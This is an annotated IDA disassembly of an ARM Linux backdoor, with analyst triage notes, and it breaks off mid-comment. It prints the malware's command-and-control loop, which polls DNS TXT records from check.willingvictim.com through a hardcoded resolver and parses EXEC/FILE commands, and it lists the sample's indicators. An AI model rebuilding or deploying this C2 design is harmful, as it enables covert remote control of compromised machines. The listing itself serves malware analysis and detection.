.init:00010B18 ;
.init:00010B18 ; +-------------------------------------------------------------------------+
.init:00010B18 ; |   This file has been generated by The Interactive Disassembler (IDA)    |
.init:00010B18 ; |           Copyright (c) 2015 Hex-Rays, <support@hex-rays.com>           |
.init:00010B18 ; +-------------------------------------------------------------------------+
.init:00010B18 ;
.init:00010B18 ; Input MD5   : A09965D9859390F9A327B8FA017F79AA
.init:00010B18 ; Input CRC32 : F36E250C
.init:00010B18
.init:00010B18 ; File Name   : sgdnsc2
.init:00010B18 ; Format      : ELF for ARM (Executable)
.init:00010B18 ; Imagebase   : 10000
.init:00010B18 ; Interpreter '/lib/ld-musl-armhf.so.1'
.init:00010B18 ; Needed Library 'libcrypto.so.1.0.0'
.init:00010B18 ; Needed Library 'libnet.so.9'
.init:00010B18 ; Needed Library 'libgcc_s.so.1'
.init:00010B18 ; Needed Library 'libc.so'
.init:00010B18 ;
.init:00010B18 ; Options : EF_ARM_VFP_FLOAT
.init:00010B18 ; EABI version: 5
.init:00010B18 ;
.init:00010B18
.init:00010B18 ; Processor       : ARM
.init:00010B18 ; ARM architecture: ARMv6K
.init:00010B18 ; Target assembler: Generic assembler for ARM
.init:00010B18 ; Byte sex        : Little endian
.init:00010B18
.init:00010B18 ; ---------------------------------------------------------------------------
.init:00010B18 ; Analyst notes (triage of this listing):
.init:00010B18 ;  - musl-linked ARMv6 ELF.  The import set in .plt below combines the libc
.init:00010B18 ;    stub resolver (res_init / res_query / ns_initparse / ns_parserr), raw
.init:00010B18 ;    packet crafting (libnet_build_dnsv4 / _udp / _ipv4, libnet_write),
.init:00010B18 ;    OpenSSL base64 BIOs and popen/pclose.  That combination alone is a
.init:00010B18 ;    strong static indicator of a DNS-tunnelled command channel; the
.init:00010B18 ;    popen caller is outside this chunk, so what is executed is not shown here.
.init:00010B18 ;  - Raw IPv4 injection (libnet_init with injection type 1) requires root
.init:00010B18 ;    or CAP_NET_RAW; the reply path in buildAndSendDNSPacket exits on
.init:00010B18 ;    failure, so the sample is only fully functional when run privileged.
.init:00010B18 ;  - Host/network indicators visible in this listing: resolver address
.init:00010B18 ;    172.16.240.129 written directly into _res (send_packet_to_C_C),
.init:00010B18 ;    TXT queries for check.willingvictim.com, and forged DNS *responses*
.init:00010B18 ;    (flags 0x8180, id 0x1337) sent from UDP port 53 to port 0x6666 with
.init:00010B18 ;    IP id 0xF2 and TTL 64 (buildAndSendDNSPacket).  The assert strings
.init:00010B18 ;    in base64_decode leak the original source name "client.c".
.init:00010B18 ; ---------------------------------------------------------------------------
.init:00010B18
.init:00010B18 ; ===========================================================================
.init:00010B18
.init:00010B18 ; Segment type: Pure code
.init:00010B18                 AREA .init, CODE
.init:00010B18                 ; ORG 0x10B18
.init:00010B18                 CODE32
.init:00010B18
.init:00010B18 ; =============== S U B R O U T I N E =======================================
.init:00010B18
.init:00010B18 ; Compiler-generated _init: an empty push/pop pair followed by an
.init:00010B18 ; interworking return (bit 0 of LR selects ARM vs. Thumb caller).
.init:00010B18 ; No program logic lives here; it is passed to __libc_start_main by start.
.init:00010B18                 EXPORT .init_proc
.init:00010B18 .init_proc                              ; DATA XREF: start+20o
.init:00010B18                                         ; .text:inito
.init:00010B18                 STMFD   SP!, {R0,LR}    ; _init
.init:00010B1C                 LDMFD   SP!, {R0,LR}
.init:00010B20                 TST     LR, #1          ; Thumb return address?
.init:00010B24                 MOVEQ   PC, LR          ; no: plain ARM return
.init:00010B28                 BX      LR              ; yes: interworking return
.init:00010B28 ; End of function .init_proc
.init:00010B28
.init:00010B28 ; .init ends
.init:00010B28
.plt:00010B2C ; ---------------------------------------------------------------------------
.plt:00010B2C ; ===========================================================================
.plt:00010B2C
.plt:00010B2C ; Segment type: Pure code
.plt:00010B2C                 AREA .plt, CODE
.plt:00010B2C                 ; ORG 0x10B2C
.plt:00010B2C                 CODE32
.plt:00010B2C ; PLT0: lazy-binding trampoline.  PC reads as 0x10B34+8 = 0x10B3C, so after
.plt:00010B2C ; the ADD, LR = &_GLOBAL_OFFSET_TABLE_; the final LDR writes back LR = GOT+8
.plt:00010B2C ; and jumps through that slot (conventionally the dynamic linker's resolver).
.plt:00010B2C                 STR     LR, [SP,#-4]!
.plt:00010B30                 LDR     LR, =(_GLOBAL_OFFSET_TABLE_ - 0x10B3C)
.plt:00010B34                 ADD     LR, PC, LR      ; _GLOBAL_OFFSET_TABLE_
.plt:00010B38                 LDR     PC, [LR,#8]!
.plt:00010B38 ; ---------------------------------------------------------------------------
.plt:00010B3C off_10B3C       DCD _GLOBAL_OFFSET_TABLE_ - 0x10B3C
.plt:00010B3C                                         ; DATA XREF: .plt:00010B30r
.plt:00010B40 ; Import stubs (each 0xC bytes).  Read as the sample's capability list:
.plt:00010B40 ; DNS resolver, file I/O, heap, libnet raw packets, OpenSSL BIO base64, popen.
.plt:00010B40 ; [0000000C BYTES: COLLAPSED FUNCTION printf. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010B4C ; [0000000C BYTES: COLLAPSED FUNCTION exit. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010B58 ; [0000000C BYTES: COLLAPSED FUNCTION ns_initparse. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010B64 ; [0000000C BYTES: COLLAPSED FUNCTION strstr. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010B70 ; [0000000C BYTES: COLLAPSED FUNCTION fread. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010B7C ; [0000000C BYTES: COLLAPSED FUNCTION ns_parserr. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010B88 ; [0000000C BYTES: COLLAPSED FUNCTION fgets. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010B94 ; [0000000C BYTES: COLLAPSED FUNCTION calloc. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010BA0 ; [0000000C BYTES: COLLAPSED FUNCTION htons. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010BAC
.plt:00010BAC ; =============== S U B R O U T I N E =======================================
.plt:00010BAC
.plt:00010BAC ; Attributes: thunk
.plt:00010BAC
.plt:00010BAC ; struct __res_state *_res_state(void)
.plt:00010BAC ; PLT entry for __res_state (the "_res" accessor).  R12 = 0x10BB4 + 0x11000 =
.plt:00010BAC ; 0x21BB4, so the jump goes through the GOT slot __res_state_ptr.  IDA shows
.plt:00010BAC ; this one expanded only because it has named code XREFs.
.plt:00010BAC __res_state                             ; CODE XREF: send_packet_to_C_C+28p
.plt:00010BAC                                         ; send_packet_to_C_C+38p ...
.plt:00010BAC                 ADR     R12, 0x10BB4
.plt:00010BB0                 ADD     R12, R12, #0x11000
.plt:00010BB4                 LDR     PC, [R12,#(__res_state_ptr - 0x21BB4)]! ; __imp___res_state
.plt:00010BB4 ; End of function __res_state
.plt:00010BB4
.plt:00010BB8 ; [0000000C BYTES: COLLAPSED FUNCTION free. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010BC4 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_push. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010BD0 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_read. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010BDC ; [0000000C BYTES: COLLAPSED FUNCTION fprintf. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010BE8 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_f_base64. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010BF4 ; [0000000C BYTES: COLLAPSED FUNCTION libnet_get_ipaddr4. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C00 ; [0000000C BYTES: COLLAPSED FUNCTION memcpy. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C0C ; [0000000C BYTES: COLLAPSED FUNCTION libnet_build_ipv4. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C18 ; [0000000C BYTES: COLLAPSED FUNCTION libnet_destroy. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C24 ; [0000000C BYTES: COLLAPSED FUNCTION pclose. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C30 ; [0000000C BYTES: COLLAPSED FUNCTION memset. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C3C ; [0000000C BYTES: COLLAPSED FUNCTION res_init. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C48 ; [0000000C BYTES: COLLAPSED FUNCTION popen. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C54 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_set_flags. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C60 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_new_mem_buf. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C6C ; [0000000C BYTES: COLLAPSED FUNCTION res_query. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C78 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_new. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C84 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_ctrl. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C90 ; [0000000C BYTES: COLLAPSED FUNCTION fwrite. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010C9C ; [0000000C BYTES: COLLAPSED FUNCTION fopen. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010CA8 ; [0000000C BYTES: COLLAPSED FUNCTION __deregister_frame_info. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010CB4 ; [0000000C BYTES: COLLAPSED FUNCTION snprintf. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010CC0 ; [0000000C BYTES: COLLAPSED FUNCTION __register_frame_info. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010CCC ; [0000000C BYTES: COLLAPSED FUNCTION libnet_init. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010CD8 ; [0000000C BYTES: COLLAPSED FUNCTION __libc_start_main. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010CE4 ; [0000000C BYTES: COLLAPSED FUNCTION fseek. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010CF0 ; [0000000C BYTES: COLLAPSED FUNCTION fclose. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010CFC ; [0000000C BYTES: COLLAPSED FUNCTION libnet_build_dnsv4. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D08 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_free_all. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D14 ; [0000000C BYTES: COLLAPSED FUNCTION inet_aton. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D20 ; [0000000C BYTES: COLLAPSED FUNCTION libnet_write. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D2C ; [0000000C BYTES: COLLAPSED FUNCTION libnet_geterror. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D38 ; [0000000C BYTES: COLLAPSED FUNCTION sleep. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D44 ; [0000000C BYTES: COLLAPSED FUNCTION strlen. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D50 ; [0000000C BYTES: COLLAPSED FUNCTION libnet_build_udp. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D5C ; [0000000C BYTES: COLLAPSED FUNCTION BIO_write. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D68 ; [0000000C BYTES: COLLAPSED FUNCTION libnet_name2addr4. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D74 ; [0000000C BYTES: COLLAPSED FUNCTION BIO_s_mem. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D80 ; [0000000C BYTES: COLLAPSED FUNCTION __assert_fail. PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D8C ; [0000000C BYTES: COLLAPSED FUNCTION malloc.
.plt:00010D8C ;   PRESS CTRL-NUMPAD+ TO EXPAND]
.plt:00010D98 ; [0000000C BYTES: COLLAPSED FUNCTION ftell. PRESS CTRL-NUMPAD+ TO EXPAND]
.text:00010DA4
.text:00010DA4
.text:00010DA4
.text:00010DA4 ;*************************************************************
.text:00010DA4 ;*  mainLoop                                                 *
.text:00010DA4 ;*************************************************************
.text:00010DA4 ;* DESCRIPTION : main loop. Contact C&C server, if there is  *
.text:00010DA4 ;*               a valid command, executes it, if not, sleep *
.text:00010DA4 ;*               for one minute                              *
.text:00010DA4 ;*                                                           *
.text:00010DA4 ;* INPUT  : none (installed as "main" by start, see the      *
.text:00010DA4 ;*          `main DCD mainLoop` pointer after start)         *
.text:00010DA4 ;* RETURN : never (noreturn); both exits of the loop jump    *
.text:00010DA4 ;*          back to lookForC2Command                         *
.text:00010DA4 ;*                                                           *
.text:00010DA4 ;* NOTES  : - the 0x200-byte calloc result is never checked  *
.text:00010DA4 ;*            for NULL and never freed                       *
.text:00010DA4 ;*          - both sleep() calls read the same word          *
.text:00010DA4 ;*            (dword_21ED0, see waitABigMinute); the "one    *
.text:00010DA4 ;*            minute" / "2 seconds" annotations cannot both  *
.text:00010DA4 ;*            hold, confirm the stored value                 *
.text:00010DA4 ;*          - detection: the loop produces a fixed-interval  *
.text:00010DA4 ;*            DNS TXT beacon (see send_packet_to_C_C)        *
.text:00010DA4 ;*************************************************************
.text:00010DA4
.text:00010DA4 ; ===========================================================================
.text:00010DA4
.text:00010DA4 ; Segment type: Pure code
.text:00010DA4                 AREA .text, CODE
.text:00010DA4                 ; ORG 0x10DA4
.text:00010DA4                 CODE32
.text:00010DA4
.text:00010DA4 ; =============== S U B R O U T I N E =======================================
.text:00010DA4
.text:00010DA4 ; Attributes: noreturn
.text:00010DA4
.text:00010DA4 mainLoop                                ; DATA XREF: start+24o
.text:00010DA4                                         ; .text:maino
.text:00010DA4                 STMFD   SP!, {R4-R6,LR}
.text:00010DA8                 MOV     R1, #1          ; size
.text:00010DAC                 MOV     R0, #0x200      ; nmemb
.text:00010DB0                 BL      calloc          ; 512-byte zeroed buffer; NULL result not checked
.text:00010DB4                 MOV     R4, R0          ; R4 = answer buffer shared by every C2 helper below
.text:00010DB8                 LDR     R5, =aHello     ; "HELLO:" -- R5 only serves as a PC-relative base (0x21E54) for .data reads
.text:00010DBC
.text:00010DBC lookForC2Command                        ; CODE XREF: mainLoop+38j
.text:00010DBC                                         ; mainLoop+60j
.text:00010DBC                 LDR     R0, [R5,#(dword_21ED0 - 0x21E54)] ; seconds
.text:00010DC0                 BL      sleep           ; 2 seconds sleep
.text:00010DC4                 MOV     R0, R4          ; buffer for the decoded answer
.text:00010DC8                 BL      init_session_with_C2_server ; HELLO handshake over DNS
.text:00010DCC                 CMP     R0, #1          ; 1 = "HELLO:" received
.text:00010DD0                 BEQ     HELLOReceived
.text:00010DD4                 LDR     R0, =aConnectionCoul ; "\nConnection could not be made. Sleepin"...
.text:00010DD8                 BL      printf          ; fixed string: easy static/console signature
.text:00010DDC                 B       lookForC2Command ; retry forever
.text:00010DE0 ; ---------------------------------------------------------------------------
.text:00010DE0
.text:00010DE0 HELLOReceived                           ; CODE XREF: mainLoop+2Cj
.text:00010DE0                 LDR     R0, =aControlServerS ; "\nControl server says HELLO. Entering c"...
.text:00010DE4                 BL      printf
.text:00010DE8                 B       command_received ; first command fetch happens without a sleep
.text:00010DEC ; ---------------------------------------------------------------------------
.text:00010DEC
.text:00010DEC waitABigMinute                          ; CODE XREF: mainLoop+5Cj
.text:00010DEC                 LDR     R0, [R5,#0x7C]  ; seconds -- 0x21E54+0x7C = 0x21ED0, i.e. the same dword_21ED0 as at lookForC2Command
.text:00010DF0                 BL      sleep
.text:00010DF4
.text:00010DF4 command_received                        ; CODE XREF: mainLoop+44j
.text:00010DF4                 MOV     R0, R4
.text:00010DF8                 BL      InterpretAndExecuteCommand ; (defined outside this chunk)
.text:00010DFC                 CMN     R0, #1          ; Z set iff R0 == -1
.text:00010E00                 BNE     waitABigMinute  ; any other status: sleep, then poll again
.text:00010E04                 B       lookForC2Command ; -1: drop back to the HELLO handshake
.text:00010E04 ; End of function mainLoop
.text:00010E04
.text:00010E04 ; ---------------------------------------------------------------------------
.text:00010E08 off_10E08       DCD aHello              ; DATA XREF: mainLoop+14r
.text:00010E08                                         ; "HELLO:"
.text:00010E0C ; char *format
.text:00010E0C format          DCD aConnectionCoul     ; DATA XREF: mainLoop+30r
.text:00010E0C                                         ; "\nConnection could not be made. Sleepin"...
.text:00010E10 ; char *off_10E10
.text:00010E10 off_10E10       DCD aControlServerS     ; DATA XREF: mainLoop:HELLOReceivedr
.text:00010E10                                         ; "\nControl server says HELLO. Entering c"...
.text:00010E14
.text:00010E14 ; =============== S U B R O U T I N E =======================================
.text:00010E14
.text:00010E14 ; Attributes: noreturn
.text:00010E14
.text:00010E14 ; int __fastcall start(void (*fini)(void), int, int, int, void (*rtld_fini)(void))
.text:00010E14 ; ELF entry point (crt1-style).  Pops argc, takes argv = SP, pushes
.text:00010E14 ; stack_end / fini / .term_proc and calls __libc_start_main with
.text:00010E14 ; main = mainLoop and init = .init_proc.  There is no "main" symbol:
.text:00010E14 ; mainLoop is the program body.  The call never returns (mainLoop is
.text:00010E14 ; noreturn); the self-branch at loc_10E40 is the conventional trap.
.text:00010E14                 EXPORT start
.text:00010E14 start
.text:00010E14
.text:00010E14 var_8           = -8
.text:00010E14 fini            = -4
.text:00010E14 rtld_fini       =  0
.text:00010E14
.text:00010E14                 MOV     R11, #0         ; clear frame pointer
.text:00010E18                 MOV     LR, #0          ; outermost frame marker
.text:00010E1C                 LDR     R1, [SP+rtld_fini],#4 ; argc
.text:00010E20                 MOV     R2, SP          ; ubp_av
.text:00010E24                 LDR     R3, =.term_proc
.text:00010E28                 STR     R11, [SP,#-4+rtld_fini]! ; stack_end
.text:00010E2C                 STR     R0, [SP,#fini]! ; fini
.text:00010E30                 STR     R3, [SP,#4+var_8]!
.text:00010E34                 LDR     R3, =.init_proc ; init
.text:00010E38                 LDR     R0, =mainLoop   ; main
.text:00010E3C                 BL      __libc_start_main
.text:00010E40
.text:00010E40 loc_10E40                               ; CODE XREF: start:loc_10E40j
.text:00010E40                 B       loc_10E40       ; unreachable in practice
.text:00010E40 ; End of function start
.text:00010E40
.text:00010E40 ; ---------------------------------------------------------------------------
.text:00010E44 off_10E44       DCD .term_proc          ; DATA XREF: start+10r
.text:00010E48 ; void (*init)(void)
.text:00010E48 init            DCD .init_proc          ; DATA XREF: start+20r
.text:00010E4C ; int (__cdecl *main)(int, char **, char **)
.text:00010E4C main            DCD mainLoop            ; DATA XREF: start+24r
.text:00010E50
.text:00010E50 ; =============== S U B R O U T I N E =======================================
.text:00010E50
.text:00010E50 ; crt boilerplate (looks like deregister_tm_clones -- not part of the
.text:00010E50 ; malicious logic).  If (0x21EDB - __bss_start) <= 6 it returns; otherwise
.text:00010E50 ; it loads a pool word that is 0 here (unresolved weak symbol) and so
.text:00010E50 ; returns at BXEQ as well.  The tail BX R3 is never reached.
.text:00010E50 sub_10E50                               ; CODE XREF: sub_10EB8+18p
.text:00010E50                 LDR     R0, =__bss_start
.text:00010E54                 LDR     R3, =0x21EDB
.text:00010E58                 RSB     R3, R0, R3      ; R3 = 0x21EDB - __bss_start
.text:00010E5C                 CMP     R3, #6
.text:00010E60                 BXLS    LR
.text:00010E64                 LDR     R3, =0          ; off_10E7C (0)
.text:00010E68                 CMP     R3, #0
.text:00010E6C                 BXEQ    LR
.text:00010E70                 BX      R3
.text:00010E70 ; End of function sub_10E50
.text:00010E70
.text:00010E70 ; ---------------------------------------------------------------------------
.text:00010E74 off_10E74       DCD __bss_start         ; DATA XREF: sub_10E50r
.text:00010E78 dword_10E78     DCD 0x21EDB             ; DATA XREF: sub_10E50+4r
.text:00010E7C off_10E7C       DCD 0                   ; DATA XREF: sub_10E50+14r
.text:00010E80
.text:00010E80 ; =============== S U B R O U T I N E =======================================
.text:00010E80
.text:00010E80 ; crt boilerplate (looks like register_tm_clones).  R1 = (__bss_start -
.text:00010E80 ; __bss_start) / 4 / 2 = 0, so the MOVS sets Z and the function returns
.text:00010E80 ; immediately; the BX R3 tail is dead.
.text:00010E80 sub_10E80                               ; CODE XREF: sub_10F00:loc_10F20p
.text:00010E80                 LDR     R0, =__bss_start
.text:00010E84                 LDR     R1, =__bss_start
.text:00010E88                 RSB     R1, R0, R1      ; always 0
.text:00010E8C                 MOV     R1, R1,ASR#2
.text:00010E90                 ADD     R1, R1, R1,LSR#31 ; round toward zero before the halving
.text:00010E94                 MOVS    R1, R1,ASR#1
.text:00010E98                 BXEQ    LR
.text:00010E9C                 LDR     R3, =0          ; off_10EB4 (0)
.text:00010EA0                 CMP     R3, #0
.text:00010EA4                 BXEQ    LR
.text:00010EA8                 BX      R3
.text:00010EA8 ; End of function sub_10E80
.text:00010EA8
.text:00010EA8 ; ---------------------------------------------------------------------------
.text:00010EAC off_10EAC       DCD __bss_start         ; DATA XREF: sub_10E80r
.text:00010EB0 off_10EB0       DCD __bss_start         ; DATA XREF: sub_10E80+4r
.text:00010EB4 off_10EB4       DCD 0                   ; DATA XREF: sub_10E80+1Cr
.text:00010EB8
.text:00010EB8 ; =============== S U B R O U T I N E =======================================
.text:00010EB8
.text:00010EB8 ; crt boilerplate (looks like __do_global_dtors_aux), registered in
.text:00010EB8 ; .fini_array.  Guarded by the byte_21EDC "completed" flag: runs once,
.text:00010EB8 ; calls sub_10E50, optionally __deregister_frame_info(unk_11C84) when the
.text:00010EB8 ; pool word dword_10EF8 is non-zero (it is 0 here), then sets the flag.
.text:00010EB8 sub_10EB8                               ; DATA XREF: .fini_array:00021C8Co
.text:00010EB8                 LDR     R3, =byte_21EDC
.text:00010EBC                 LDRB    R2, [R3]        ; already run?
.text:00010EC0                 CMP     R2, #0
.text:00010EC4                 BXNE    LR
.text:00010EC8                 STMFD   SP!, {R4,LR}
.text:00010ECC                 MOV     R4, R3          ; keep &flag across the calls
.text:00010ED0                 BL      sub_10E50
.text:00010ED4                 LDR     R3, =0          ; dword_10EF8 (0)
.text:00010ED8                 CMP     R3, #0
.text:00010EDC                 BEQ     loc_10EE8
.text:00010EE0                 LDR     R0, =unk_11C84
.text:00010EE4                 BL      __deregister_frame_info
.text:00010EE8
.text:00010EE8 loc_10EE8                               ; CODE XREF: sub_10EB8+24j
.text:00010EE8                 MOV     R3, #1
.text:00010EEC                 STRB    R3, [R4]        ; flag = 1
.text:00010EF0                 LDMFD   SP!, {R4,PC}
.text:00010EF0 ; End of function sub_10EB8
.text:00010EF0
.text:00010EF0 ; ---------------------------------------------------------------------------
.text:00010EF4 off_10EF4       DCD byte_21EDC          ; DATA XREF: sub_10EB8r
.text:00010EF8 dword_10EF8     DCD 0                   ; DATA XREF: sub_10EB8+1Cr
.text:00010EFC off_10EFC       DCD unk_11C84           ; DATA XREF: sub_10EB8+28r
.text:00010F00
.text:00010F00 ; =============== S U B R O U T I N E =======================================
.text:00010F00
.text:00010F00 ; crt boilerplate (looks like frame_dummy), registered in .init_array.
.text:00010F00 ; When the pool word dword_10F24 is non-zero (it is 0 here) it calls
.text:00010F00 ; __register_frame_info(unk_11C84, unk_21EE0); it then tail-jumps to
.text:00010F00 ; sub_10E80.  Skip during triage.
.text:00010F00 sub_10F00                               ; DATA XREF: .init_array:00021C88o
.text:00010F00                 LDR     R3, =0          ; dword_10F24 (0)
.text:00010F04                 CMP     R3, #0
.text:00010F08                 BEQ     loc_10F20
.text:00010F0C                 STMFD   SP!, {R4,LR}
.text:00010F10                 LDR     R1, =unk_21EE0
.text:00010F14                 LDR     R0, =unk_11C84
.text:00010F18                 BL      __register_frame_info
.text:00010F1C                 LDMFD   SP!, {R4,LR}
.text:00010F20
.text:00010F20 loc_10F20                               ; CODE XREF: sub_10F00+8j
.text:00010F20                 B       sub_10E80       ; tail call
.text:00010F20 ; End of function sub_10F00
.text:00010F20
.text:00010F20 ; ---------------------------------------------------------------------------
.text:00010F24 dword_10F24     DCD 0                   ; DATA XREF: sub_10F00r
.text:00010F28 off_10F28       DCD unk_21EE0           ; DATA XREF: sub_10F00+10r
.text:00010F2C off_10F2C       DCD unk_11C84           ; DATA XREF: sub_10F00+14r
.text:00010F30
.text:00010F30
.text:00010F30
.text:00010F30 ;*************************************************************
.text:00010F30 ;*  GetCommandID                                             *
.text:00010F30 ;*************************************************************
.text:00010F30 ;* DESCRIPTION : look for commands in the R0 string (held in *
.text:00010F30 ;*               R4 across the strstr calls).                *
.text:00010F30 ;*                                                           *
.text:00010F30 ;* INPUT  :                                                  *
.text:00010F30 ;*   R0 = command string (copied to R4, a decoded, NUL-      *
.text:00010F30 ;*        terminated buffer from base64_decode)              *
.text:00010F30 ;*                                                           *
.text:00010F30 ;* OUTPUT :                                                  *
.text:00010F30 ;*                                                           *
.text:00010F30 ;* RETURN :                                                  *
.text:00010F30 ;*   0 for an unknown command                                *
.text:00010F30 ;*   1 for "HELLO:"                                          *
.text:00010F30 ;*   2 for "NONE:"                                           *
.text:00010F30 ;*   3 for "EXEC:"                                           *
.text:00010F30 ;*   4 for "FILE:"                                           *
.text:00010F30 ;*                                                           *
.text:00010F30 ;* NOTES  : matching uses strstr, so the keyword may appear  *
.text:00010F30 ;*          anywhere in the string, not just at the start,   *
.text:00010F30 ;*          and the checks are ordered HELLO, NONE, EXEC,    *
.text:00010F30 ;*          FILE -- the first hit wins.  The four keywords   *
.text:00010F30 ;*          are good static signatures for this family.      *
.text:00010F30 ;*************************************************************
.text:00010F30
.text:00010F30
.text:00010F30 ; =============== S U B R O U T I N E =======================================
.text:00010F30
.text:00010F30
.text:00010F30 getCommandID                            ; CODE XREF: init_session_with_C2_server+38p
.text:00010F30                                         ; InterpretAndExecuteCommand+4Cp
.text:00010F30                 STMFD   SP!, {R4,LR}
.text:00010F34                 LDR     R1, =aHello     ; "HELLO:"
.text:00010F38                 MOV     R4, R0          ; R4 = haystack for all four probes
.text:00010F3C                 BL      strstr
.text:00010F40                 CMP     R0, #0
.text:00010F44                 BEQ     Is_it_NONE
.text:00010F48                 MOV     R0, #1          ; HELLO:
.text:00010F4C                 LDMFD   SP!, {R4,PC}
.text:00010F50 ; ---------------------------------------------------------------------------
.text:00010F50
.text:00010F50 Is_it_NONE                              ; CODE XREF: getCommandID+14j
.text:00010F50                 LDR     R1, =aNone      ; "NONE:"
.text:00010F54                 MOV     R0, R4          ; haystack
.text:00010F58                 BL      strstr
.text:00010F5C                 CMP     R0, #0
.text:00010F60                 BEQ     Is_it_EXEC
.text:00010F64                 MOV     R0, #2          ; NONE:
.text:00010F68                 LDMFD   SP!, {R4,PC}
.text:00010F6C ; ---------------------------------------------------------------------------
.text:00010F6C
.text:00010F6C Is_it_EXEC                              ; CODE XREF: getCommandID+30j
.text:00010F6C                 LDR     R1, =aExec      ; "EXEC:"
.text:00010F70                 MOV     R0, R4          ; haystack
.text:00010F74                 BL      strstr
.text:00010F78                 CMP     R0, #0
.text:00010F7C                 BEQ     Is_it_FILE
.text:00010F80                 MOV     R0, #3          ; EXEC:
.text:00010F84                 LDMFD   SP!, {R4,PC}
.text:00010F88 ; ---------------------------------------------------------------------------
.text:00010F88
.text:00010F88 Is_it_FILE                              ; CODE XREF: getCommandID+4Cj
.text:00010F88                 MOV     R0, R4          ; haystack
.text:00010F8C                 LDR     R1, =aFile      ; "FILE:"
.text:00010F90                 BL      strstr
.text:00010F94                 CMP     R0, #0
.text:00010F98                 MOVNE   R0, #4          ; FILE:
.text:00010F9C                 MOVEQ   R0, #0          ; unknown command
.text:00010FA0                 LDMFD   SP!, {R4,PC}
.text:00010FA0 ; End of function getCommandID
.text:00010FA0
.text:00010FA0 ; ---------------------------------------------------------------------------
.text:00010FA4 ; char *needle
.text:00010FA4 needle          DCD aHello              ; DATA XREF: getCommandID+4r
.text:00010FA4                                         ; "HELLO:"
.text:00010FA8 ; char *off_10FA8
.text:00010FA8 off_10FA8       DCD aNone               ; DATA XREF: getCommandID:Is_it_NONEr
.text:00010FA8                                         ; "NONE:"
.text:00010FAC ; char *off_10FAC
.text:00010FAC off_10FAC       DCD aExec               ; DATA XREF: getCommandID:Is_it_EXECr
.text:00010FAC                                         ; "EXEC:"
.text:00010FB0 ; char *off_10FB0
.text:00010FB0 off_10FB0       DCD aFile               ; DATA XREF: getCommandID+5Cr
.text:00010FB0                                         ; "FILE:"
.text:00010FB4
.text:00010FB4
.text:00010FB4
.text:00010FB4 ;*************************************************************
.text:00010FB4 ;*  send_packet_to_C_C                                       *
.text:00010FB4 ;*************************************************************
.text:00010FB4 ;* DESCRIPTION : downstream C2 channel.  Forces the resolver *
.text:00010FB4 ;*   (_res) to 172.16.240.129:53, issues a TXT query for the *
.text:00010FB4 ;*   name in R1 through res_query, parses the first answer   *
.text:00010FB4 ;*   RR and copies its text (past the TXT length byte) into  *
.text:00010FB4 ;*   the caller's buffer with snprintf "%s".                 *
.text:00010FB4 ;*                                                           *
.text:00010FB4 ;* INPUT:                                                    *
.text:00010FB4 ;*   R0 = output buffer for the (still base64) answer text   *
.text:00010FB4 ;*   R1 = host name used to ask DNS request                  *
.text:00010FB4 ;*        - check.willingvictim.com is used to ask for a     *
.text:00010FB4 ;*          command to execute                               *
.text:00010FB4 ;*                                                           *
.text:00010FB4 ;* RETURN:                                                   *
.text:00010FB4 ;*   R0 = 1 on success, -1 if res_query returned <= 0        *
.text:00010FB4 ;*                                                           *
.text:00010FB4 ;* NOTES:                                                    *
.text:00010FB4 ;*   - ns_initparse / ns_parserr results are ignored and the *
